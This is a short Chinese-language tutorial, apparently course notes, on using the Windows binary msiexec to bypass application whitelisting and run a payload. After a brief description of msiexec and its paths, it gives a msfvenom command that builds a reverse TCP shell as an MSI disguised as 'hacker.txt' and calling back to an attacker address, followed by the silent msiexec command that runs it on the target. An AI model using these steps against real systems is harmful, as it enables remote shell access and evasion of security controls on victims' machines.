复现亮神课程 基于白名单执行payload--Msiexec
0x01 关于msiexec
Msiexec 是 Windows Installer 的一部分。用于安装 Windows Installer 安装包(MSI),一般在运行 Microsoft Update 安装更新或安装部分软件的时候出现,占用内存比较大。并且集成于 Windows 2003,Windows 7 等。
说明:Msiexec.exe所在路径已被系统添加PATH环境变量中,因此,Msiexec命令可识别。
Windows 2003 默认位置:
C:\WINDOWS\system32\msiexec.exe
C:\WINDOWS\SysWOW64\msiexec.exe
0x02 复现
Msf配置:
配置payload:
msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.190.141 LPORT=4444 -f msi > hacker.txt
靶机执行:
C:\Users\Administrator\Desktop\Msiexec>msiexec /q /i hacker.txt
